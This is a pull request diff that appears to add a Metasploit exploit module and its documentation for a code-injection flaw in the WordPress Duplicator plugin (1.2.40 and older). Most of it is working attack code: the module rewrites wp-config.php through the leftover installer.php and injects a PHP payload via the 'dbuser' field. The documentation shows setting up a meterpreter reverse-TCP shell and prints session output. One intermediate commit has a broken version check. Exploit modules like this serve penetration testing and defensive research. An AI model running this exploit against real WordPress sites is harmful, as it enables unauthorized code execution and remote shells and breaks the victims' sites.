### PR TITLE
Added WordPress Duplicator <= 1.2.40 and documentation

### DIFF
--- a/documentation/modules/exploit/multi/php/wordpress_duplicator.md
+++ b/documentation/modules/exploit/multi/php/wordpress_duplicator.md
@@ -1,38 +1,36 @@
-Duplicator is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files:
+Duplicator by Snap Creek is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files:
 * An ZIP archive with the complete WordPress files and Duplicator specific files:
-  * A copy of the installer.php script: installer-backup.php
-  * A SQL script that will be used to restore the database content: database.sql
-* An installer PHP script to restore the archive installer.php
+  * A copy of the `installer.php` script: `installer-backup.php`
+  * A SQL script that will be used to restore the database content: `database.sql`
+* An installer PHP script to restore the archive `installer.php`
 
-When the installer.php completes its process, the following files remain in the directory and has to be manually deleted:
+When the `installer.php` completes its process, the following files remain in the directory and has to be manually deleted:
 * The ZIP archive
-* database.sql 
-* installer-backup.php 
-* installer-data.sql 
-* installer-log.txt 
-* installer.php 
+* `database.sql` 
+* `installer-backup.php`
+* `installer-data.sql` 
+* `installer-log.txt`
+* `installer.php`
+
+WARNING: exploiting the vulnerability will overwrite the wp-config.php file, breaking the Wordpress instance.
 
 ## Vulnerable application
 
-Install a vulnerable version of WordPress Duplicator (<= 1.2.40) and create a backup.
-Put the install.php and archive files on a clean web server.
+Install a vulnerable version of [WordPress Duplicator (<= 1.2.40)](https://downloads.wordpress.org/plugin/duplicator.1.2.40.zip) and create a backup.
+Put the `install.php` and archive files on a clean web server.
 
 ## Verification Steps
 
-
-Confirm that check functionality works:
-- [ ] Open a browser to check the installer.php file is accessible
-- [ ] Start `msfconsole`
-- [ ] `use exploit/multi/php/wordpress_duplicator-`
-- [ ] Set the `RHOST`.
-- [ ] Confirm the target is vulnerable: `check`
-- [ ] Confirm that the target is vulnerable: `The target is vulnerable.`
-
-Confirm that command execution functionality works:
-- [ ] Set a payload: `set PAYLOAD php/meterpreter/reverse_tcp`
-- [ ] Set `LHOST` and `LPORT`
-- [ ] Run the exploit: `run`
-- [ ] Confirm you have now a meterpreter session
+Confirm that functionality works:
+1. Start `msfconsole`
+2. `use exploit/multi/php/wordpress_duplicator-`
+3. Set the `RHOST`.
+4. Confirm the target is vulnerable: `check`
+5. Confirm that the target is vulnerable: `The target is vulnerable.`
+6. Set a payload: `set PAYLOAD php/meterpreter/reverse_tcp`
+7. Set `LHOST` and `LPORT`
+8. Run the exploit: `run`
+9. Confirm you have now a meterpreter session
 
 ## Options
 
@@ -43,11 +41,11 @@ The path to the installer.php file to exploit By default, the path is `/installe
 
 ## Scenarios
 
-### Meterpreter reverse tcp
+### Debian 9 running Wordpress 4.9.8 with Duplicator 1.2.40
 
 ```
 msf5 > use exploit/multi/php/wordpress_duplicator 
-msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 192.168.56.101
+msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
 RHOSTS => 192.168.56.101
 msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
 LHOST => 192.168.56.1
@@ -61,7 +59,7 @@ msf5 exploit(multi/php/wordpress_duplicator) > run
 [*] Successfully created the wp-config.php file!
 [*] All good! Injecting PHP code in the wp-config.php file...
 [*] Requesting wp-config.php to execute the payload...
-[*] Sending stage (37775 bytes) to 192.168.56.101
+[*] Sending stage (37775 bytes) to 1.1.1.1
 
 meterpreter > sysinfo 
 Computer    : debian

--- a/documentation/modules/exploit/multi/php/wordpress_duplicator.md
+++ b/documentation/modules/exploit/multi/php/wordpress_duplicator.md
@@ -12,7 +12,7 @@ When the `installer.php` completes its process, the following files remain in th
 * `installer-log.txt`
 * `installer.php`
 
-WARNING: exploiting the vulnerability will overwrite the wp-config.php file, breaking the Wordpress instance.
+WARNING: exploiting the vulnerability will overwrite the wp-config.php file, breaking the WordPress instance.
 
 ## Vulnerable application
 
@@ -23,7 +23,7 @@ Put the `install.php` and archive files on a clean web server.
 
 Confirm that functionality works:
 1. Start `msfconsole`
-2. `use exploit/multi/php/wordpress_duplicator-`
+2. `use exploit/multi/php/wordpress_duplicator`
 3. Set the `RHOST`.
 4. Confirm the target is vulnerable: `check`
 5. Confirm that the target is vulnerable: `The target is vulnerable.`
@@ -41,7 +41,7 @@ The path to the installer.php file to exploit By default, the path is `/installe
 
 ## Scenarios
 
-### Debian 9 running Wordpress 4.9.8 with Duplicator 1.2.40
+### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40
 
 ```
 msf5 > use exploit/multi/php/wordpress_duplicator 

--- a/documentation/modules/exploit/multi/php/wordpress_duplicator.md
+++ b/documentation/modules/exploit/multi/php/wordpress_duplicator.md
@@ -1,0 +1,71 @@
+Duplicator is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files:
+* An ZIP archive with the complete WordPress files and Duplicator specific files:
+  * A copy of the installer.php script: installer-backup.php
+  * A SQL script that will be used to restore the database content: database.sql
+* An installer PHP script to restore the archive installer.php
+
+When the installer.php completes its process, the following files remain in the directory and has to be manually deleted:
+* The ZIP archive
+* database.sql 
+* installer-backup.php 
+* installer-data.sql 
+* installer-log.txt 
+* installer.php 
+
+## Vulnerable application
+
+Install a vulnerable version of WordPress Duplicator (<= 1.2.40) and create a backup.
+Put the install.php and archive files on a clean web server.
+
+## Verification Steps
+
+
+Confirm that check functionality works:
+- [ ] Open a browser to check the installer.php file is accessible
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/php/wordpress_duplicator-`
+- [ ] Set the `RHOST`.
+- [ ] Confirm the target is vulnerable: `check`
+- [ ] Confirm that the target is vulnerable: `The target is vulnerable.`
+
+Confirm that command execution functionality works:
+- [ ] Set a payload: `set PAYLOAD php/meterpreter/reverse_tcp`
+- [ ] Set `LHOST` and `LPORT`
+- [ ] Run the exploit: `run`
+- [ ] Confirm you have now a meterpreter session
+
+## Options
+
+**TARGETURI**
+
+The path to the installer.php file to exploit By default, the path is `/installer.php`.
+
+
+## Scenarios
+
+### Meterpreter reverse tcp
+
+```
+msf5 > use exploit/multi/php/wordpress_duplicator 
+msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
+TARGETURI => /installer_vuln.php
+msf5 exploit(multi/php/wordpress_duplicator) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Checking if the wp-config.php file already exists...
+[*] This WordPress was not restored. Creating the wp-config.php file...
+[*] Successfully created the wp-config.php file!
+[*] All good! Injecting PHP code in the wp-config.php file...
+[*] Requesting wp-config.php to execute the payload...
+[*] Sending stage (37775 bytes) to 192.168.56.101
+
+meterpreter > sysinfo 
+Computer    : debian
+OS          : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
+Meterpreter : php/linux
+```
+

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'          => [ 'Julien Legras <julien.legras@synacktiv.com>', 'Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>' ],
       'References'     => [
         ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],
-        ['URL', 'https://wpvulndb.com/vulnerabilities/9123']
+        ['URL', 'https://wpvulndb.com/vulnerabilities/9123'],
+		['CVE', 'CVE-2018-17207']
       ],
       'License'         => MSF_LICENSE,
       'Privileged'      => false,

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'     => %q{
         When the WordPress plugin Duplicator restores a backup, it leaves dangerous files in the filesystem such as
         installer.php and installer-backup.php. These files allow anyone to call a function that overwrite the wp-config.php file
-        AND this function does not sanitize POST parameters before inserting them inside the wp-config.php file, leading to 
+        AND this function does not sanitize POST parameters before inserting them inside the wp-config.php file, leading to
         arbitrary PHP code execution.
         WARNING: This exploit WILL break the wp-config.php file. If possible try to restore backups of the configuration after the exploit
         to make the WordPress site work again.
@@ -22,8 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'          => [ 'Julien Legras <julien.legras@synacktiv.com>', 'Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>' ],
       'References'     => [
         ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],
-        ['URL', 'https://wpvulndb.com/vulnerabilities/9123'],
-        ['CVE', 'CVE-2018-17207']
+        ['WPVDB', '9123'],
+        ['CVE', '2018-17207']
       ],
       'License'         => MSF_LICENSE,
       'Privileged'      => false,

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     => [
         ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],
         ['URL', 'https://wpvulndb.com/vulnerabilities/9123'],
-		['CVE', 'CVE-2018-17207']
+        ['CVE', 'CVE-2018-17207']
       ],
       'License'         => MSF_LICENSE,
       'Privileged'      => false,

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -52,17 +52,24 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     tpath = normalize_uri(datastore['TARGETURI'])
 
-    print_status("Checking URI #{rhost+tpath}")
+    vprint_status("Checking URI #{rhost+tpath}")
     response = send_request_cgi({ 'uri' => tpath}, timeout=datastore['TIMEOUT'])
-    return Exploit::CheckCode::Unknown unless response
+
+    unless response
+        vprint_error 'Connection failed'
+        return Exploit::CheckCode::Unknown
+    end
+
+    unless response.code == 200
+        vprint_error("Server responded with #{response.code}")
+        return Exploit::CheckCode::Safe
+    end
 
     version = response.body.to_s.scan( /version: ([^<]*)</).last.first
-    if response && response.code == 200
-        return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
-        Exploit::CheckCode::Detected
+    if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
+        return Exploit::CheckCode::Vulnerable
     else
-        Exploit::CheckCode::Safe
-        vprint_error("Server responded with #{response.code}")
+        return Exploit::CheckCode::Detected
     end
 
   end

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -4,22 +4,28 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ManualRanking
+  Rank = ManualRanking # this module overwrites the configuration file, breaking the website
 
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'            => 'Snapcreek Duplicator WordPress plugin installer.php code injection',
+      'Name'            => 'Snap Creek Duplicator WordPress plugin code injection',
       'Description'     => %q{
-        When the WordPress plugin Duplicator restores a backup, it leaves dangerous files in the filesystem such as
-        installer.php and installer-backup.php. These files allow anyone to call a function that overwrite the wp-config.php file
-        AND this function does not sanitize POST parameters before inserting them inside the wp-config.php file, leading to
-        arbitrary PHP code execution.
-        WARNING: This exploit WILL break the wp-config.php file. If possible try to restore backups of the configuration after the exploit
-        to make the WordPress site work again.
+        When the WordPress plugin Snap Creek Duplicator restores a backup, it 
+        leaves dangerous files in the filesystem such as installer.php and
+        installer-backup.php. These files allow anyone to call a function that
+        overwrite the wp-config.php file AND this function does not sanitize
+        POST parameters before inserting them inside the wp-config.php file,
+        leading to arbitrary PHP code execution.
+        WARNING: This exploit WILL break the wp-config.php file. If possible try
+        to restore backups of the configuration after the exploit to make the
+        WordPress site work again.
       },
-      'Author'          => [ 'Julien Legras <julien.legras@synacktiv.com>', 'Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>' ],
+      'Author'          => [
+        'Julien Legras <julien.legras@synacktiv.com>',
+        'Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>'
+      ],
       'References'     => [
         ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],
         ['WPVDB', '9123'],
@@ -32,7 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote
       {
         'PAYLOAD' => 'php/meterpreter/reverse_tcp'
       },
-
       'Platform'        => 'php',
       'Arch'            => ARCH_PHP,
       'Targets'         => [['WordPress Duplicator <= 1.2.40', {}]],
@@ -46,29 +51,31 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     tpath = normalize_uri(datastore['TARGETURI'])
 
-    print_status("Checking uri #{rhost+tpath}")
-    response = send_request_raw({ 'uri' => tpath})
+    print_status("Checking URI #{rhost+tpath}")
+    response = send_request_cgi({ 'uri' => tpath})
     version = response.body.to_s.scan( /version: ([^<]*)</).last.first
-    return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
-    vprint_error("Server responded with #{response.code}")
-    return Exploit::CheckCode::Safe
+    if response && response.code == 200
+        return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
+        Exploit::CheckCode::Safe
+    else
+        vprint_error("Server responded with #{response.code}")
+    end
 
   end
 
   def exploit
-    payload_oneline = payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
-
     print_status("Checking if the wp-config.php file already exists...")
     tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')
     response = send_request_cgi({ 'uri' => tpath_wp_config})
 
-    if response.code == 404 # we have to perform action_step 2 to create the wp-config.php file.
+    if response && response.code == 404 # we have to perform action_step 1 to create the wp-config.php file.
       print_status("This WordPress was not restored. Creating the wp-config.php file...")
       # 1. GET the installer.php to retrieve the archive name.
       response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])})
-      archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
-      if archive_name.length > 0
+      if response && response.code == 200
+        archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
         archive_name = archive_name.first.first
+        print_status("Found archive name #{archive_name}")
         # 2. Perform the 1st step to actually create the wp-config.php file.
         response = send_request_cgi({
           'method' => 'POST',
@@ -83,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'logging' => "1"
           }
         })
-        if response.code == 200
+        if response && response.code == 200
           print_status("Successfully created the wp-config.php file!")
         else
           print_error("The archive file #{archive_name} was probably deleted.")
@@ -106,12 +113,35 @@ class MetasploitModule < Msf::Exploit::Remote
         'dbhost' => rand_text_alphanumeric(20),
         'dbname' => rand_text_alphanumeric(20),
         'dbpass' => rand_text_alphanumeric(20),
-        'dbuser' => "');" + payload_oneline + "/*",
+        'dbuser' => "');?>" + payload.encoded + "/*",
         'dbport' => rand_text_numeric(5)
       }
     })
 
-    print_status("Requesting wp-config.php to execute the payload...")
-    response = send_request_cgi({ 'uri' => tpath_wp_config})
+    if response && response.code == 200
+      sleep(3)
+      print_status("Requesting wp-config.php to execute the payload...")
+      send_request_cgi({ 'uri' => tpath_wp_config})
+    else
+      print_error("Failed to inject PHP code in wp-config.php...")
+    end
+  end
+
+  def on_new_session(session)
+    print_status("Cleaning up...")
+    sleep(3)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(datastore['TARGETURI']),
+      'vars_post'   => {
+        'action_ajax' => "3",
+        'action_step' => "3",
+        'dbhost' => rand_text_alphanumeric(20),
+        'dbname' => rand_text_alphanumeric(20),
+        'dbpass' => rand_text_alphanumeric(20),
+        'dbuser' => "test",
+        'dbport' => rand_text_numeric(5)
+      }
+    })
   end
 end

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -98,12 +98,10 @@ class MetasploitModule < Msf::Exploit::Remote
       if response && response.code == 200
         print_status("Successfully created the wp-config.php file!")
       else
-        print_error("The archive file #{archive_name} was probably deleted.")
-        return
+        fail_with(Failure::Unknown, "The archive file #{archive_name} was probably deleted.")
       end
     else
-      print_error("Failed to retrieve the archive name, cannot create the wp-config.php file")
-      return
+      fail_with(Failure::NotFound, "Failed to retrieve the archive name, cannot create the wp-config.php file.")
     end
   end
 

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'            => 'Snap Creek Duplicator WordPress plugin code injection',
       'Description'     => %q{
-        When the WordPress plugin Snap Creek Duplicator restores a backup, it 
+        When the WordPress plugin Snap Creek Duplicator restores a backup, it
         leaves dangerous files in the filesystem such as installer.php and
         installer-backup.php. These files allow anyone to call a function that
         overwrite the wp-config.php file AND this function does not sanitize
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     version = response.body.to_s.scan( /version: ([^<]*)</).last.first
     if response && response.code == 200
-        return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.timeout=datastore['TIMEOUT']")
+        return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
         Exploit::CheckCode::Detected
     else
         Exploit::CheckCode::Safe

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -53,11 +53,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Checking URI #{rhost+tpath}")
     response = send_request_cgi({ 'uri' => tpath})
+    return Exploit::CheckCode::Unknown unless response
+
+    version = response.body.to_s.scan( /version: ([^<]*)</).last.first
     if response && response.code == 200
-        version = response.body.to_s.scan( /version: ([^<]*)</).last.first
         return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
-        Exploit::CheckCode::Safe
+        Exploit::CheckCode::Detected
     else
+        Exploit::CheckCode::Safe
         vprint_error("Server responded with #{response.code}")
     end
 

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -45,6 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
+      OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 40]),
       ])
   end
 
@@ -52,12 +53,12 @@ class MetasploitModule < Msf::Exploit::Remote
     tpath = normalize_uri(datastore['TARGETURI'])
 
     print_status("Checking URI #{rhost+tpath}")
-    response = send_request_cgi({ 'uri' => tpath})
+    response = send_request_cgi({ 'uri' => tpath}, timeout=datastore['TIMEOUT'])
     return Exploit::CheckCode::Unknown unless response
 
     version = response.body.to_s.scan( /version: ([^<]*)</).last.first
     if response && response.code == 200
-        return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
+        return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.timeout=datastore['TIMEOUT']")
         Exploit::CheckCode::Detected
     else
         Exploit::CheckCode::Safe
@@ -69,12 +70,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     print_status("Checking if the wp-config.php file already exists...")
     tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')
-    response = send_request_cgi({ 'uri' => tpath_wp_config})
+    response = send_request_cgi({ 'uri' => tpath_wp_config}, timeout=datastore['TIMEOUT'])
 
     if response && response.code == 404 # we have to perform action_step 1 to create the wp-config.php file.
       print_status("This WordPress was not restored. Creating the wp-config.php file...")
       # 1. GET the installer.php to retrieve the archive name.
-      response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])})
+      response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}, timeout=datastore['TIMEOUT'])
       if response && response.code == 200
         archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
         archive_name = archive_name.first.first
@@ -92,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'archive_filetime' => "current",
             'logging' => "1"
           }
-        })
+        }, timeout=datastore['TIMEOUT'])
         if response && response.code == 200
           print_status("Successfully created the wp-config.php file!")
         else
@@ -119,12 +120,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'dbuser' => "');?>" + payload.encoded + "/*",
         'dbport' => rand_text_numeric(5)
       }
-    })
+    }, timeout=datastore['TIMEOUT'])
 
     if response && response.code == 200
-      sleep(3)
       print_status("Requesting wp-config.php to execute the payload...")
-      send_request_cgi({ 'uri' => tpath_wp_config})
+      send_request_cgi({ 'uri' => tpath_wp_config }, timeout=datastore['TIMEOUT'])
     else
       print_error("Failed to inject PHP code in wp-config.php...")
     end
@@ -132,7 +132,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_new_session(session)
     print_status("Cleaning up...")
-    sleep(3)
     send_request_cgi({
       'method' => 'POST',
       'uri'    => normalize_uri(datastore['TARGETURI']),
@@ -145,6 +144,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'dbuser' => "test",
         'dbport' => rand_text_numeric(5)
       }
-    })
+    }, timeout=datastore['TIMEOUT'])
   end
 end

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Snapcreek Duplicator WordPress plugin installer.php code injection',
+      'Description'     => %q{
+        When the WordPress plugin Duplicator restores a backup, it leaves dangerous files in the filesystem such as
+        installer.php and installer-backup.php. These files allow anyone to call a function that overwrite the wp-config.php file
+        AND this function does not sanitize POST parameters before inserting them inside the wp-config.php file, leading to 
+        arbitrary PHP code execution.
+        WARNING: This exploit WILL break the wp-config.php file. If possible try to restore backups of the configuration after the exploit
+        to make the WordPress site work again.
+      },
+      'Author'          => [ 'Julien Legras <julien.legras@synacktiv.com>', 'Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>' ],
+      'References'     => [
+        ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],
+        ['URL', 'https://wpvulndb.com/vulnerabilities/9123']
+      ],
+      'License'         => MSF_LICENSE,
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Aug 29 2018',
+      'DefaultOptions'  =>
+      {
+        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+      },
+
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress Duplicator <= 1.2.40', {}]],
+      'DefaultTarget'   => 0))
+
+    register_options([
+      OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
+      ])
+  end
+
+  def check
+    tpath = normalize_uri(datastore['TARGETURI'])
+
+    print_status("Checking uri #{rhost+tpath}")
+    response = send_request_raw({ 'uri' => tpath})
+    version = response.body.to_s.scan( /version: ([^<]*)</).last.first
+    return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
+    vprint_error("Server responded with #{response.code}")
+    return Exploit::CheckCode::Safe
+
+  end
+
+  def exploit
+    payload_oneline = payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
+
+    print_status("Checking if the wp-config.php file already exists...")
+    tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')
+    response = send_request_cgi({ 'uri' => tpath_wp_config})
+
+    if response.code == 404 # we have to perform action_step 2 to create the wp-config.php file.
+      print_status("This WordPress was not restored. Creating the wp-config.php file...")
+      # 1. GET the installer.php to retrieve the archive name.
+      response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])})
+      archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
+      if archive_name.length > 0
+        archive_name = archive_name.first.first
+        # 2. Perform the 1st step to actually create the wp-config.php file.
+        response = send_request_cgi({
+          'method' => 'POST',
+          'uri'    => normalize_uri(datastore['TARGETURI']),
+          'vars_post'   => {
+            'action_ajax' => "1",
+            'action_step' => "1",
+            'archive_name' => archive_name,
+            'archive_engine' => "ziparchive",
+            'exe_safe_mode' => "0",
+            'archive_filetime' => "current",
+            'logging' => "1"
+          }
+        })
+        if response.code == 200
+          print_status("Successfully created the wp-config.php file!")
+        else
+          print_error("The archive file #{archive_name} was probably deleted.")
+          return
+        end
+      else
+        print_error("Failed to retrieve the archive name, cannot create the wp-config.php file")
+        return
+      end
+    end
+
+    # 2. Exploit the code injection.
+    print_status("All good! Injecting PHP code in the wp-config.php file...")
+    response = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(datastore['TARGETURI']),
+      'vars_post'   => {
+        'action_ajax' => "3",
+        'action_step' => "3",
+        'dbhost' => rand_text_alphanumeric(20),
+        'dbname' => rand_text_alphanumeric(20),
+        'dbpass' => rand_text_alphanumeric(20),
+        'dbuser' => "');" + payload_oneline + "/*",
+        'dbport' => rand_text_numeric(5)
+      }
+    })
+
+    print_status("Requesting wp-config.php to execute the payload...")
+    response = send_request_cgi({ 'uri' => tpath_wp_config})
+  end
+end

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -77,32 +77,35 @@ class MetasploitModule < Msf::Exploit::Remote
   def create_wp_config_file
     # 1. GET the installer.php to retrieve the archive name.
     response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}, timeout=datastore['TIMEOUT'])
-    if response && response.code == 200
-      archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
-      archive_name = archive_name.first.first
-      print_status("Found archive name #{archive_name}")
-      # 2. Perform the 1st step to actually create the wp-config.php file.
-      response = send_request_cgi({
-        'method' => 'POST',
-        'uri'    => normalize_uri(datastore['TARGETURI']),
-        'vars_post'   => {
-          'action_ajax' => "1",
-          'action_step' => "1",
-          'archive_name' => archive_name,
-          'archive_engine' => "ziparchive",
-          'exe_safe_mode' => "0",
-          'archive_filetime' => "current",
-          'logging' => "1"
-        }
-      }, timeout=datastore['TIMEOUT'])
-      if response && response.code == 200
-        print_status("Successfully created the wp-config.php file!")
-      else
-        fail_with(Failure::Unknown, "The archive file #{archive_name} was probably deleted.")
-      end
-    else
+    unless response && response.code == 200
       fail_with(Failure::NotFound, "Failed to retrieve the archive name, cannot create the wp-config.php file.")
     end
+    archive_name = response.body.to_s.scan(/value="([^"]*.zip)"/).flatten.first
+    if archive_name.blank?
+      fail_with(Failure::NotFound, "Failed to retrieve the archive name, cannot create the wp-config.php file.")
+    end
+
+    print_status("Found archive name #{archive_name}")
+
+    # 2. Perform the 1st step to actually create the wp-config.php file.
+    response = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(datastore['TARGETURI']),
+      'vars_post'   => {
+        'action_ajax' => "1",
+        'action_step' => "1",
+        'archive_name' => archive_name,
+        'archive_engine' => "ziparchive",
+        'exe_safe_mode' => "0",
+        'archive_filetime' => "current",
+        'logging' => "1"
+      }
+    }, timeout=datastore['TIMEOUT'])
+    unless response && response.code == 200
+      fail_with(Failure::Unknown, "The archive file #{archive_name} was probably deleted.")
+    end
+
+    print_status("Successfully created the wp-config.php file!")
   end
 
   def exploit
@@ -112,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if response && response.code == 404 # we have to perform action_step 1 to create the wp-config.php file.
       print_status("This WordPress was not restored. Creating the wp-config.php file...")
-      create_wp_config_file()
+      create_wp_config_file
     end
 
     # 2. Exploit the code injection.

--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@@ -56,22 +56,55 @@ class MetasploitModule < Msf::Exploit::Remote
     response = send_request_cgi({ 'uri' => tpath}, timeout=datastore['TIMEOUT'])
 
     unless response
-        vprint_error 'Connection failed'
-        return Exploit::CheckCode::Unknown
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
     end
 
     unless response.code == 200
-        vprint_error("Server responded with #{response.code}")
-        return Exploit::CheckCode::Safe
+      vprint_error("Server responded with #{response.code}")
+      return CheckCode::Safe
     end
 
     version = response.body.to_s.scan( /version: ([^<]*)</).last.first
     if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
-        return Exploit::CheckCode::Vulnerable
+      return CheckCode::Vulnerable
     else
-        return Exploit::CheckCode::Detected
+      return CheckCode::Detected
     end
 
+  end
+
+  def create_wp_config_file
+    # 1. GET the installer.php to retrieve the archive name.
+    response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}, timeout=datastore['TIMEOUT'])
+    if response && response.code == 200
+      archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
+      archive_name = archive_name.first.first
+      print_status("Found archive name #{archive_name}")
+      # 2. Perform the 1st step to actually create the wp-config.php file.
+      response = send_request_cgi({
+        'method' => 'POST',
+        'uri'    => normalize_uri(datastore['TARGETURI']),
+        'vars_post'   => {
+          'action_ajax' => "1",
+          'action_step' => "1",
+          'archive_name' => archive_name,
+          'archive_engine' => "ziparchive",
+          'exe_safe_mode' => "0",
+          'archive_filetime' => "current",
+          'logging' => "1"
+        }
+      }, timeout=datastore['TIMEOUT'])
+      if response && response.code == 200
+        print_status("Successfully created the wp-config.php file!")
+      else
